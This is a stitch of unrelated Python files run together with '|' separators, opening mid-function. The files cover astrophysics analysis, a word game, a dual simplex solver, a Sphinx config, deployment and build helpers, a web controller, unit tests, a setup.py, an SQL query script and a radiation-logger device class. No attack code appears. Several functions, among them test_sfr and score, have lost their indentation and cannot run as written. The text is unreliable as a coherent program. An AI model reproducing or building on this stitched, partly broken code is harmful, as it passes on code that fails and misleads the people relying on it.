    return SFR, lookback_time, binsize # SFR [Msol Gyr^-1] (sSFR [Gyr^-1]), Lookback Time [Gyr], binsize [Gyr]
def test_sfr(context):
'''
Test SFR calculation is working correctly by integrating and comparing to total stellar mass
'''
import seren3
import numpy as np
from scipy import integrate
snap_sfr, lbtime, bsize = sfr(context) # compute the global star formation history using the star particles
dset = context.s["mass"].flatten() # load stellar mass dset
mstar_tot = dset["mass"].in_units("Msol").sum()
integrated_mstar = integrate.trapz(snap_sfr, lbtime) # integrate over history of the Universe
print mstar_tot, integrated_mstar
# Assert the integrated star formation history is close to the total stellar mass
assert(np.allclose(mstar_tot, integrated_mstar, rtol=1e-1)), "Error: Integrated stellar mass not close to actual."
print "Passed"
########################################## CDM ##########################################
def splatter_projection_extensive(context):
    '''
    Make a projection of the desired (extensive) field using the splatter engine
    '''
    from seren3.analysis.visualization import engines

    # Mass is extensive, so the plain splatter engine applies directly and
    # chooses the operator/unit itself (dark matter family - context.d).
    engine = engines.SplatterEngine(context.d, "mass")

    # Camera describing the region to image; raise map_max_size (keep it a
    # power of 2) for a higher resolution map.
    camera = context.camera()
    camera.map_max_size = 2048

    projection = engine.process(camera)
    # save_plot accepts options such as the colormap;
    # run help(projection.save_plot) to see them.
    plot = projection.save_plot()
    plot.show()
def splatter_projection_extensive_simple(context):
    '''
    There is a shortcut for simple projections on the Family object
    '''
    from seren3.analysis.visualization import EngineMode  # projection-mode enum

    # Family.projection wires the splatter engine up for us.
    plot = context.d.projection("mass", mode=EngineMode.SPLATTER).save_plot()
    plot.show()
def rhoc_cic(context):
    '''
    Performs CIC interpolation to compute CDM density on the simulation coarse grid in units
    kg/m^3.

    Returns
    -------
    numpy.ndarray of shape (N, N, N) with N = 2**levelmin, axes 0 and 2
    swapped relative to the sampling order but kept C-contiguous.
    '''
    import numpy as np
    from seren3.utils.cython import cic
    from seren3.utils import deconvolve_cic
    unit_l = context.array(context.info["unit_length"]) # the code unit length
    dset = context.d["pos"].flatten() # load the dset
    x,y,z = dset["pos"].in_units(unit_l).T # separate positions into x,y,z (in code length units)
    x = np.ascontiguousarray(x); y = np.ascontiguousarray(y); z = np.ascontiguousarray(z) # cic requires c contiguous arrays
    npart = len(x)
    # Coarse-grid resolution and box length (code units).
    N = 2**context.info['levelmin']
    L = context.info['boxlen'] # box units
    # Perform CIC interpolation. This supports OpenMP threading if OMP_NUM_THREADS env var is set
    rho = np.zeros(N**3) # init empty grid, filled in place by the cython routine
    cic.cic(x,y,z,npart,L,N,rho) # do the CIC. openmp enabled, set env. var OMP_NUM_THREADS
    rho = rho.reshape((N, N, N))
    # Deconvolve CIC kernel
    print "Deconvolving CIC kernel"
    rho = deconvolve_cic(rho, N) # deconvolve the CIC kernel to recover small-scale power
    print "Done"
    # Compute units: convert particle counts per cell into kg/m^3 using the
    # (uniform) particle mass and the physical cell width.
    boxmass = context.quantities.box_mass(species='cdm').in_units("kg") # total box mass
    pm_mass = boxmass/npart # particle mass
    boxsize = context.array(context.info['unit_length']).in_units('m')
    dx = boxsize/N # cell width at levelmin
    rhoc_unit = pm_mass/dx**3
    rho *= rhoc_unit
    # Low-level C I/O routines assemble data as a contiguous, C-ordered (nvars, twotondim, ngrids) numpy.ndarray
    # Swap data => shape : (ngrids, twotondim, nvars)
    ####### WARNING : must keep C-ordered contiguity !!! #######
    return np.ascontiguousarray(np.swapaxes(rho, 0, 2))
def deltac_cic(context, rhoc=None):
    '''
    Returns CDM overdensity field
    '''
    from seren3.cosmology import rho_mean_z

    cosmo = context.cosmo  # cosmological parameter dictionary
    # CDM-only density parameter: total matter minus baryons.
    omega_cdm = cosmo['omega_M_0'] - cosmo['omega_b_0']
    mean_density = rho_mean_z(omega_cdm, **cosmo)  # mean CDM density at this redshift

    # Compute the CIC density field unless the caller supplied one.
    if rhoc is None:
        rhoc = rhoc_cic(context)

    # Overdensity: fractional deviation from the mean CDM density.
    return (rhoc - mean_density) / mean_density
from functools import reduce
import math
import random
##################
### Dictionary ###
##################
# Load the word list once at import time; every entry is stored lowercased so
# lookups in isValid() are case-insensitive.  The context manager guarantees
# the file is closed even if reading fails (the original left it open on
# error), and the comprehension replaces the manual append loop.
# NOTE(review): `dictionary` is a list, so membership tests are O(n); a set
# would be faster but would change the module-level type.
with open("words.txt", "r") as wordsFile:
    dictionary = [line.strip().lower() for line in wordsFile]
###############
### Letters ###
###############
# Tile-frequency table: maps each playable letter (note the two-character
# "Qu" tile) to how many tiles of that letter exist in the bag; used as the
# weighting for random draws.
letters = {"A": 7, "B": 3, "C": 4, "D": 5, "E": 8, "F": 3, "G": 3, "H": 3, "I": 7, "J": 1, "K": 2, "L": 5, "M": 5,
           "N": 5, "O": 7, "P": 3, "Qu": 1, "R": 5, "S": 6, "T": 5, "U": 5, "V": 1, "W": 2, "X": 1, "Y": 2, "Z": 1}
# returns true if the word played is valid and false otherwise
def isValid(listOfLetters):
    """Return True when the played letters spell a word in the dictionary.

    *listOfLetters* is a sequence of letter strings; they are concatenated
    and lowercased before the lookup.
    """
    # str.join replaces the previous functools.reduce concatenation: it is the
    # idiomatic, linear-time way to flatten a list of strings.
    word = "".join(listOfLetters).lower()
    return word in dictionary
# add regex or similar for proper noun checking
# calculates the score of a word once its played and returns it as an integer
def score(listOfLetters):
total = 0
if len(listOfLetters) == 7:
total += 20
for letter in listOfLetters:
total += letter.square.height + 2
return total
# need to add intersections of words
# draws a new letter for the player, weighted by the letter-frequency table
def getNewLetter(dic):
    """Draw a new letter at random, weighted by the counts in *dic*.

    BUG FIX: the original assigned the pick to a local variable and never
    returned it, so the function always returned None.
    """
    return weightedPick(dic)
def weightedPick(dic):
    """Return a random key of *dic*, chosen with probability proportional
    to its (non-negative numeric) value.

    BUG FIX: dict.itervalues()/iteritems() are Python-2-only; .values() and
    .items() behave the same here and also work on Python 3.
    """
    r = random.uniform(0, sum(dic.values()))
    s = 0.0
    for k, w in dic.items():
        s += w
        if r < s:
            return k
    # Floating-point round-off can leave r just past the final cumulative
    # total; fall back to the last key examined.
    return k
|
from __future__ import division
from ..lab1.Solver import Solver
from ..lab2.SimplexMethod import get_basis_matrix, get_cannonical_form, get_basis_cost_vector
from sympy import zeros, Matrix
from sympy.functions import transpose
import bisect
class DualSimplexMethod(object):
    """
    Dual simplex method for linear programs brought to canonical form.

    :type matrix_c:Matrix
    :type matrix_A:Matrix
    :type matrix_b:Matrix
    :type precision:float
    """
    def __init__(self, matrix_c, matrix_A, matrix_b, precision, condition_operators=None):
        self.matrix_c = matrix_c
        self._matrix_A = matrix_A
        self.matrix_b = matrix_b
        self.precision = precision
        self.m, self.n = matrix_A.shape
        # Default every constraint to an equality when no operators are given.
        if condition_operators is None:
            self.condition_operators = ["="] * self.m
        else:
            self.condition_operators = condition_operators
        self.solver = Solver(self.precision)
    def solve(self, basis_indexes_set, maximize, vector_y=None):
        """
        Canonicalize the problem, build the initial reduced costs and run the
        dual simplex algorithm.

        :type basis_indexes_set: list[int]
        :param maximize: True to maximize the objective, False to minimize
        :param vector_y: optional starting dual plan; computed as c_B * B^-1
            from the supplied basis when omitted
        """
        self._matrix_A, self.matrix_c = get_cannonical_form(self._matrix_A, self.condition_operators, self.matrix_c, maximize)
        self.m, self.n = self._matrix_A.shape
        basis_indexes_set.sort()
        not_basis_indexes_set = sorted(set(range(self.n)) - set(basis_indexes_set))
        if vector_y is None:
            vector_y = transpose(get_basis_cost_vector(basis_indexes_set, self.matrix_c)) * get_basis_matrix(basis_indexes_set, self._matrix_A).inv()
        # Reduced-cost estimates for the non-basis columns.
        vector_kaplan = zeros(self.m + self.n, 1)
        for j in not_basis_indexes_set:
            vector_kaplan[j, 0] = (vector_y * self._matrix_A[:, j])[0, 0] - self.matrix_c[j, 0]
        return self.dual_simplex_algorithm(basis_indexes_set, not_basis_indexes_set, vector_kaplan)
    def dual_simplex_algorithm(self, basis_indexes_set, not_basis_indexes_set, vector_kaplan):
        """
        Iterate dual simplex pivots until the pseudo-plan becomes feasible.

        :type basis_indexes_set: list[int]
        :type not_basis_indexes_set: list[int]
        :raises Exception: when the direct task's constraints are incompatible
        """
        basis_matrix = zeros(self.m, len(basis_indexes_set))
        for i, j in enumerate(basis_indexes_set):
            basis_matrix[:, i] = self._matrix_A[:, j]
        inverse_basis_matrix = basis_matrix.inv()
        while True:
            # Pseudo-plan for the current basis.
            vector_kappa = inverse_basis_matrix * self.matrix_b
            for j in range(vector_kappa.shape[0]):
                if vector_kappa[j, 0] < 0:
                    break
            else:
                # No negative component: the pseudo-plan is feasible, hence optimal.
                basis_plan = zeros(self.n, 1)
                for i, j in enumerate(basis_indexes_set):
                    basis_plan[j, 0] = vector_kappa[i, 0]
                return basis_plan, basis_indexes_set
            for k, j in enumerate(basis_indexes_set):
                if vector_kappa[k, 0] < 0:
                    # Row k leaves the basis; choose the entering column by the
                    # minimal sigma ratio over columns with negative mu.
                    vector_mu = zeros(self.n, 1)
                    vector_sigma = []
                    for j_nb in not_basis_indexes_set:
                        vector_mu[j_nb, 0] = inverse_basis_matrix[k, :] * self._matrix_A[:, j_nb]
                        if vector_mu[j_nb, 0] < 0:
                            vector_sigma.append(-vector_kaplan[j_nb, 0] / vector_mu[j_nb, 0])
                        else:
                            vector_sigma.append(None)
                    min_sigma_index = 0
                    min_sigma = vector_sigma[0]
                    for i, sigma in enumerate(vector_sigma):
                        if sigma is None:
                            continue
                        elif min_sigma is None or sigma < min_sigma:
                            min_sigma = sigma
                            min_sigma_index = i
                    if min_sigma is None:
                        raise Exception("Limitations of direct task are incompatible")
                    min_sigma_index = not_basis_indexes_set[min_sigma_index]
                    # Swap the leaving index j for the entering one, keeping
                    # both index sets sorted.
                    basis_indexes_set.pop(k)
                    bisect.insort_left(basis_indexes_set, min_sigma_index)
                    not_basis_indexes_set.remove(min_sigma_index)
                    bisect.insort_left(not_basis_indexes_set, j)
                    # Update the reduced costs for the new basis.
                    vector_kaplan[min_sigma_index, 0] = 0
                    for j_nb in not_basis_indexes_set:
                        vector_kaplan[j_nb, 0] = vector_kaplan[j_nb, 0] + min_sigma * vector_mu[j_nb, 0]
                    vector_kaplan[j] = min_sigma
                    # BUG FIX: the refreshed matrix must be inverted before the
                    # next iteration (cf. the .inv() call in solve()); the
                    # original assigned the raw basis matrix here and then used
                    # it as if it were its inverse.
                    inverse_basis_matrix = get_basis_matrix(basis_indexes_set, self._matrix_A).inv()
                    break
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from pprint import pprint
# Make the package importable for autodoc (docs live one level below the root).
sys.path.insert(0, os.path.abspath("../"))
# -- Project information -----------------------------------------------------
project = "PhyloMAF"
copyright = "2021, Farid Musa"
author = "Farid Musa"
# The full version, including alpha/beta/rc tags
release = "1.0"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    "sphinx_rtd_theme",
    "sphinx.ext.autodoc",
    "sphinx.ext.viewcode",
    "sphinx.ext.doctest",
    "sphinx.ext.napoleon",
    "sphinx.ext.intersphinx",
    "sphinx.ext.autosummary",
    "sphinx.ext.extlinks",
    "sphinx.ext.autosectionlabel",
    "sphinx.ext.coverage",
    "sphinx_git",
    "sphinx-prompt",
    "sphinx_copybutton",
    "hoverxref.extension",
    "sphinxcontrib.bibtex",
]
# Coverage Configs
coverage_show_missing_items = True
# Napoleon Configs: accept both Google- and NumPy-style docstrings.
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_use_param = True
napoleon_use_ivar = True
# InterSphinx Configs: cross-link into these projects' object inventories.
intersphinx_mapping = {
    "biom": ("https://biom-format.org/", None),
    "pandas": ("https://pandas.pydata.org/docs/", None),
    "numpy": ("https://numpy.org/doc/stable/", None),
    "python": ("https://docs.python.org/3/", None),
    "skbio": ("http://scikit-bio.org/docs/latest/", None),
    "ete3": ("http://etetoolkit.org/docs/latest/", None),
}
# Autosummary Configs
autosummary_generate = True
autosummary_generate_overwrite = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
    "_build",
    "Thumbs.db",
    ".DS_Store",
    "_templates/autosummary/*.rst",
    "_extensions/**"
]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = "alabaster"
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "PhyloMAF - Phylogenetic Microbiome Analysis Framework"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = "PhyloMAF documentation"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = "favicon.ico"
# If false, no module index is generated.
html_use_modindex = True
# Output file base name for HTML help builder.
htmlhelp_basename = "PhyloMAF-doc"
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "phylomaf_logo.png"
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# This config enables processing of __init__ docstrings
autoclass_content = "both"
# Group members
autodoc_member_order = "groupwise"
# Autodoc Typehints: render annotations in the description, not the signature.
autodoc_typehints = "description"
# Configurations for sphinx-hoverxref
hoverxref_role_types = {
    "hoverxref": "modal",
    "ref": "modal",  # for hoverxref_auto_ref config
    "confval": "tooltip",  # for custom object
    "mod": "tooltip",  # for Python Sphinx Domain
    "class": "tooltip",  # for Python Sphinx Domain
}
# Bibtex Configuration
bibtex_bibfiles = ["refs.bib"]
# Autosectionlabel configs
autosectionlabel_maxdepth = 1
autosectionlabel_prefix_document = True
# RTD Theme Configs
html_theme_options = {"titles_only": True, "prev_next_buttons_location": "both"}
def skip_member(app, what, name, obj, skip, options):
    """autodoc-skip-member hook: hide selected attributes and private methods.

    Returns True to skip the member, or None to defer to autodoc's default.
    """
    hidden_attributes = ("DATABASE_NAME", "INVALID_TAXA", "SEQ_EXTRACT_METHODS")
    if what == "attribute" and name in hidden_attributes:
        return True
    if what == "method" and name.startswith("_"):
        return True
    return None
def setup(app):
    """Sphinx extension entry point: register the autodoc member filter."""
    app.connect("autodoc-skip-member", skip_member)
|
"""
Idempotent API for managing supervisor processes
"""
from __future__ import with_statement
from fabtools.files import watch
from fabtools.supervisor import *
def process(name, **kwargs):
    """
    Require a supervisor process
    """
    from fabtools import require

    require.deb.package('supervisor')
    require.service.started('supervisor')

    # Merge the caller's options over the defaults.
    params = dict(kwargs)
    params.setdefault('autorestart', 'true')
    params.setdefault('redirect_stderr', 'true')

    # Render the [program:...] section from the parameters, keys sorted for a
    # stable file (so watch() only fires on real changes).
    lines = ['[program:%s]' % name]
    lines.extend("%s=%s" % (key, value) for key, value in sorted(params.items()))

    # Upload the config file; reload supervisor's config when it changed.
    filename = '/etc/supervisor/conf.d/%s.conf' % name
    with watch(filename, True, reload_config):
        require.file(filename, contents='\n'.join(lines), use_sudo=True)

    # Start the process if supervisor reports it as stopped.
    if process_status(name) == 'STOPPED':
        start_process(name)
|
"""Support for building sinan, bootstraping it on a new version of erlang"""
import sys
import os
import commands
from optparse import OptionParser
class BuildError(Exception):
    """Raised when a required build directory is missing or invalid."""

    def __init__(self, value):
        # Keep the offending value around for callers and for __str__.
        self.value = value

    def __str__(self):
        return repr(self.value)
# Erlang runtime version the Erlware packages are installed under.
ERTS_VERSION = "5.6.3"
# Template for a locally built application's ebin directory.
BUILD_PATH = "_build/development/apps/%s/ebin"
# Root of the Erlware installation.
ERLWARE_PATH = "/usr/local/erlware"
# Compiler invocation (debug_info kept for debugging/dialyzer).
ERLC = "erlc +debug_info "
# (name, version) pairs of applications built in this repository.
LOCAL_APPS = [("etask", "0.5.0"),
              ("sinan", "0.11.0.2"),
              ("sinan_web_api", "0.1.0.5")]
# name-version directories of Erlware packages the build depends on.
ERLWARE_APPS = ["fconf-0.3.0.0",
                "ktuo-0.4.0.1",
                "crary-0.2.3",
                "eunit-2.0",
                "cryptographic-0.2.1",
                "ewlib-0.8.2.0",
                "ewrepo-0.19.0.0",
                "gas-6.1.1",
                "kernel-2.12.3",
                "ibrowse-1.4",
                "uri-0.2.0",
                "sgte-0.7.1",
                "gtime-0.9.4",
                "asn1-1.5.2"]
def generate_local_path(app):
    """Return ' -pa <ebin> -I <include> ' compiler flags for a local app.

    *app* is a (name, version) tuple; raises BuildError when the app's ebin
    directory has not been built yet.
    """
    base = "_build/development/apps/%s-%s" % (app[0], app[1])
    ebin = base + "/ebin"
    include = base + "/include"
    if not os.path.isdir(ebin):
        raise BuildError(ebin + " is not a directory")
    return " -pa %s -I %s " % (ebin, include)
def generate_erlware_path(path):
    """Return ' -pa <ebin> -I <include> ' flags for an installed Erlware package.

    *path* is a name-version directory (see ERLWARE_APPS); raises BuildError
    when the package's ebin directory does not exist.
    """
    base = "%s/packages/%s/lib/%s" % (ERLWARE_PATH, ERTS_VERSION, path)
    ebin = base + "/ebin"
    include = base + "/include"
    if not os.path.isdir(ebin):
        raise BuildError(ebin + " is not a directory")
    return " -pa %s -I %s " % (ebin, include)
|
# -*- encoding: utf-8 -*-
# (C) Copyright 2008 Tarek Ziadé <tarek@ziade.org>
#
from os.path import join
import os
import logging
from routes.util import redirect_to
from yap.lib.base import *
from atomisator.main.config import AtomisatorConfig
from pylons import request
root = os.path.split(os.path.dirname(__file__))[0]
CONFIG = join(root, 'atomisator.cfg')
log = logging.getLogger(__name__)
class BackofficeController(BaseController):
    """Pylons controller for viewing and editing the Atomisator config file."""
    def _get_values(self, parser):
        # The 'rss' output entry is a tuple of up to four items:
        # (target file, link, title, description); trailing items that are
        # missing default to ''.
        rss = dict(parser.outputs)['rss']
        file_ = rss[0]
        if len(rss) > 1:
            link = rss[1]
        else:
            link = ''
        if len(rss) > 2:
            title = rss[2]
        else:
            title = ''
        if len(rss) > 3:
            description = rss[3]
        else:
            description = ''
        return file_, link, title, description
    def _set_values(self, parser, file_, link, title, description):
        # Write the rss output settings back onto the parser (inverse of
        # _get_values).
        parser.outputs = [('rss', (file_, link, title, description))]
    def index(self):
        # Render the backoffice form pre-filled from the config file.
        c.title = 'Backoffice'
        parser = AtomisatorConfig(CONFIG)
        c.atomisator = {}
        # getting parameters for the rss output
        file_, link, title, description = self._get_values(parser)
        c.atomisator['title'] = title
        # Each source is rendered as one 'name arg1 arg2 ...' line.
        s = [s[0] + ' ' + ' '.join(s[1])
             for s in parser.sources]
        c.atomisator['sources'] = '\n'.join(s)
        c.atomisator['database'] = parser.database
        c.atomisator['description'] = description
        c.atomisator['link'] = link
        s = [s[0] + ' ' + ' '.join(s[1])
             for s in parser.filters]
        c.atomisator['filters'] = '\n'.join(s)
        s = [s[0] + ' ' + ' '.join(s[1])
             for s in parser.enhancers]
        c.atomisator['enhancers'] = '\n'.join(s)
        return render('/backoffice.mako')
    def update(self):
        # Apply the submitted form values to the config file, then redirect
        # back to the index view.
        parser = AtomisatorConfig(CONFIG)
        # getting parameters for the rss output
        file_, link, title, description = self._get_values(parser)
        # TODO make atomisator cfg file read/writeable by text
        # to avoid all this crappy parsing
        _get = request.GET.get
        title = _get('title', title)
        link = _get('link', link)
        description = _get('description', description)
        self._set_values(parser, file_, link, title, description)
        parser.database = _get('database', parser.database)
        # NOTE(review): .strip() is applied to the template before
        # %-formatting, so it is a no-op here (and below).
        current = ['%s %s'.strip() % (p[0], ' '.join(p[1]))
                   for p in parser.filters]
        filters = _get('filters', '\n'.join(current))
        # Parse the textarea back into (name, (args...)) tuples, dropping
        # blank lines.
        filters = [f for f in [s.strip()
                   for s in filters.split('\n')] if f != '']
        filters = [(u[0], tuple(u[1:]))
                   for u in [f.split() for f in filters]]
        if filters != parser.filters:
            parser.filters = filters
        current = ['%s %s'.strip() % (p[0], ' '.join(p[1]))
                   for p in parser.enhancers]
        enhancers = _get('enhancers', '\n'.join(current))
        enhancers = [f for f in [s.strip()
                     for s in enhancers.split('\n')]
                     if f != '']
        enhancers = [(u[0], tuple(u[1:]))
                     for u in [f.split() for f in enhancers]]
        if enhancers != parser.enhancers:
            parser.enhancers = enhancers
        current = ['%s %s'.strip() % (p[0], ' '.join(p[1]))
                   for p in parser.sources]
        sources = _get('sources', '\n'.join(current))
        sources = [f for f in
                   [s.strip() for s in sources.split('\n')]
                   if f != '']
        sources = [(u[0], tuple(u[1:])) for u in [f.split() for f in sources]]
        parser.sources = sources
        parser.write()
        redirect_to(action='index')
|
import unittest
import os
import json
from vscodenv import extensions_json
class TestExtensionsJson(unittest.TestCase):
    """Tests for vscodenv.extensions_json's private JSON helpers."""

    def setUp(self):
        """Create a well-formed and a deliberately malformed fixture file."""
        self.not_exist_json_path = "not_exist_extensions.json"
        self.json_path = "extensions.json"
        self.json_key = "required"
        self.json_values = ['extension-1', 'extension-2']
        json_content = '{"recommendations":["extension-0"], "%s":["%s", "%s"]}' % (self.json_key, self.json_values[0], self.json_values[1])
        with open(self.json_path, "w") as json_file:
            json_file.write(json_content)
        # Broken JSON (unbalanced quotes/brackets) to exercise error handling.
        self.malformed_json_path = "malformed_extensions.json"
        malformed_json_content = '{"%s:"%s", "%s"]}' % (self.json_key, self.json_values[0], self.json_values[1])
        with open(self.malformed_json_path, "w") as json_file:
            json_file.write(malformed_json_content)

    def test_parse_json_should_return_values(self):
        ret = extensions_json._parse_json(self.json_path, self.json_key)
        self.assertCountEqual(ret, self.json_values)

    def test_parse_json_should_return_empty_if_malformed(self):
        ret = extensions_json._parse_json(self.malformed_json_path, self.json_key)
        self.assertEqual(ret, [])

    def test_parse_json_should_return_empty_if_file_not_exists(self):
        json_path = "path_does_not_exist"
        key = "required"
        ret = extensions_json._parse_json(json_path, key)
        self.assertEqual(ret, [])

    def test_parse_json_should_return_empty_if_key_not_exists(self):
        key = "key_not_exist"
        ret = extensions_json._parse_json(self.json_path, key)
        self.assertEqual(ret, [])

    def test_extend_list_json_should_extend_json_values(self):
        values = ['extension-1', 'extension-3', 'extension-4']
        # Expected result: existing values plus the new ones, no duplicates.
        result = self.json_values[:]
        for value in values:
            if value not in result:
                result.append(value)
        extensions_json._extend_list_json(self.json_path, self.json_key, values)
        with open(self.json_path) as file_json:
            data = json.load(file_json)
            json_values = data[self.json_key]
        self.assertCountEqual(json_values, result)

    def test_extend_list_json_should_create_new_file_if_not_exists(self):
        values = ['extension-1', 'extension-3', 'extension-4']
        extensions_json._extend_list_json(self.not_exist_json_path, self.json_key, values)
        with open(self.not_exist_json_path) as file_json:
            data = json.load(file_json)
            json_values = data[self.json_key]
        self.assertCountEqual(json_values, values)

    def tearDown(self):
        """Remove every fixture file, best effort.

        BUG FIX: each path is now removed independently.  The original wrapped
        all three removals in one try block, so a failure on an earlier remove
        skipped the cleanup of the remaining files (the 'not exist' fixture is
        only created by some tests).  os.remove raises OSError
        (FileNotFoundError), of which IOError is an alias in Python 3.
        """
        for path in (self.json_path, self.malformed_json_path, self.not_exist_json_path):
            try:
                os.remove(path)
            except OSError:
                pass
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
from unittest.mock import patch
import pytest
from rocketpy import Environment, SolidMotor, Rocket, Flight
@patch("matplotlib.pyplot.show")
def test_motor(mock_show):
    """Smoke test: build a Cesaroni M1670 SolidMotor and render its report.

    matplotlib's show() is patched out so allInfo() runs headless; allInfo()
    is expected to return None after producing the motor plots.
    """
    example_motor = SolidMotor(
        thrustSource="data/motors/Cesaroni_M1670.eng",
        burnOut=3.9,
        grainNumber=5,
        grainSeparation=5 / 1000,
        grainDensity=1815,
        grainOuterRadius=33 / 1000,
        grainInitialInnerRadius=15 / 1000,
        grainInitialHeight=120 / 1000,
        nozzleRadius=33 / 1000,
        throatRadius=11 / 1000,
        interpolationMethod="linear",
    )
    # `is None` (identity) instead of `== None`: PEP 8, and immune to objects
    # overriding __eq__.
    assert example_motor.allInfo() is None
|
from datetime import datetime
class RSSEntry:
    """Simple value object holding the metadata of one RSS feed entry.

    Every field is optional and defaults to None.  Annotations are quoted
    "str | None" (previously a plain ``str`` despite the None defaults);
    strings keep them valid on any Python 3 version.
    """

    def __init__(
            self,
            title: "str | None" = None,
            link: "str | None" = None,
            id: "str | None" = None,
            summary: "str | None" = None,
            published: "str | None" = None,
            author: "str | None" = None,
            media_keywords: "str | None" = None,
            media_image: "str | None" = None):
        self.title = title
        self.link = link
        self.id = id
        self.published = published
        self.summary = summary
        self.author = author
        self.media_keywords = media_keywords
        self.media_image = media_image
|
#!/usr/bin/env python
# whatlastgenre
# Improves genre metadata of audio files
# based on tags from various music sites.
#
# Copyright (c) 2012-2020 YetAnotherNerd
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""whatlastgenre setup"""
import os
from setuptools import setup
from wlg import __version__
def read(fname):
    """Return the contents of *fname*, resolved relative to this file.

    BUG FIX: the file handle is now closed deterministically via a context
    manager; the original left it open until garbage collection.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as handle:
        return handle.read()
# Package metadata / install configuration.
setup(
    name='whatlastgenre',
    version=__version__,
    license='MIT',
    url='http://github.com/YetAnotherNerd/whatlastgenre',
    description=('Improves genre metadata of audio files '
                 'based on tags from various music sites.'),
    long_description=read('README.md'),
    packages=['wlg'],
    package_data={'wlg': ['data/genres.txt', 'data/tags.txt']},
    entry_points={
        'console_scripts': [
            'whatlastgenre = wlg.whatlastgenre:main'
        ]
    },
    install_requires=['mutagen', 'requests'],
    # BUG FIX: the setuptools keyword is 'tests_require'; the misspelled
    # 'tests_requires' was silently ignored as an unknown option.
    tests_require=['pytest'],
    extras_require={
        'discogs': ['rauth'],
        'reqcache': ['requests-cache'],
    },
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Console',
        'Topic :: Multimedia :: Sound/Audio',
        'Topic :: Utilities'
    ]
)
|
from util import connect
import time
QUERY_5 = '''
select
round(avg(price), 2)
from
listings
where
neighbourhood = :entry;
'''
def main():
    """Prompt for a neighbourhood name and run task 5 against it."""
    neighbourhood = input("Specify the neighbourhood: ")
    task5(neighbourhood)
def task5(neighbourhood: str):
    """Print and return the average nightly price for *neighbourhood*.

    Returns the fetched rows (a single row; its only column is the rounded
    average, or None when the neighbourhood has no listings).
    """
    connection = connect()
    cursor = connection.cursor()

    t_start = time.process_time()
    cursor.execute(QUERY_5, {
        "entry": neighbourhood
    })
    t_taken = time.process_time() - t_start

    rows = cursor.fetchall()
    # BUG FIX: an aggregate query always yields exactly one row, so the old
    # `if len(rows):` check was always true and the "does not exist" branch
    # was unreachable (printing "$None" instead).  When the neighbourhood is
    # absent, avg() is NULL and the row holds None.
    if rows and rows[0][0] is not None:
        print("Average rental cost per night for", neighbourhood+" is:")
        for row in rows:
            print("$"+"".join(map(str, row)))
    else:
        print(neighbourhood+" Does not exist in database")

    connection.commit()
    connection.close()
    print("Total time taken: {}s".format(t_taken))
    return rows
# Run interactively when invoked as a script.
if __name__ == "__main__":
    main()
|
# Copyright (c) 2019 Dantali0n
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from threading import Condition
from typing import Type
from typing import TypeVar
from oslo_log import log
from radloggerpy import config
from radloggerpy._i18n import _
from radloggerpy.database.objects.device import DeviceObject
from radloggerpy.datastructures.device_data_buffer import DeviceDataBuffer
from radloggerpy.device.device_state_machine import DeviceStateMachine
from radloggerpy.types.device_states import DeviceStates
from radloggerpy.types.device_types import DeviceTypes
LOG = log.getLogger(__name__)
CONF = config.CONF
class Device(metaclass=abc.ABCMeta):
    """Abstract class all radiation monitoring devices should implement

    Concrete devices implement :py:meth:`_init`, :py:meth:`_run`,
    :py:meth:`stop` and :py:meth:`is_stopping`; :py:meth:`run` drives the
    state machine around those hooks and re-raises any error so the caller
    (DeviceManager) can react to it.
    """

    NAME = "Device"
    """Each radiation monitoring device should have a unique name"""

    INTERFACE = None
    """Each radiation monitoring device should use a specific interface"""

    TYPE = DeviceTypes.UNDEFINED
    """Each radiation monitoring device should define its type"""

    _U = TypeVar('_U', bound=DeviceObject)
    """Bound to :py:class:`radloggerpy.database.objects.device.DeviceObject`"""

    def __init__(self, info: Type[_U], condition: Condition):
        """Store the device description and set up the shared data buffer.

        :param info: database object describing this device instance
        :param condition: condition used to signal availability of new data
        """
        self.condition = condition
        self.info = info
        self.data = DeviceDataBuffer(self.condition)
        self._statemachine = DeviceStateMachine()

    @abc.abstractmethod
    def _init(self):
        """Method to perform device initialization

        Devices are allowed to clear any flags or variables set when stop() was
        called previously inside of this method.
        """

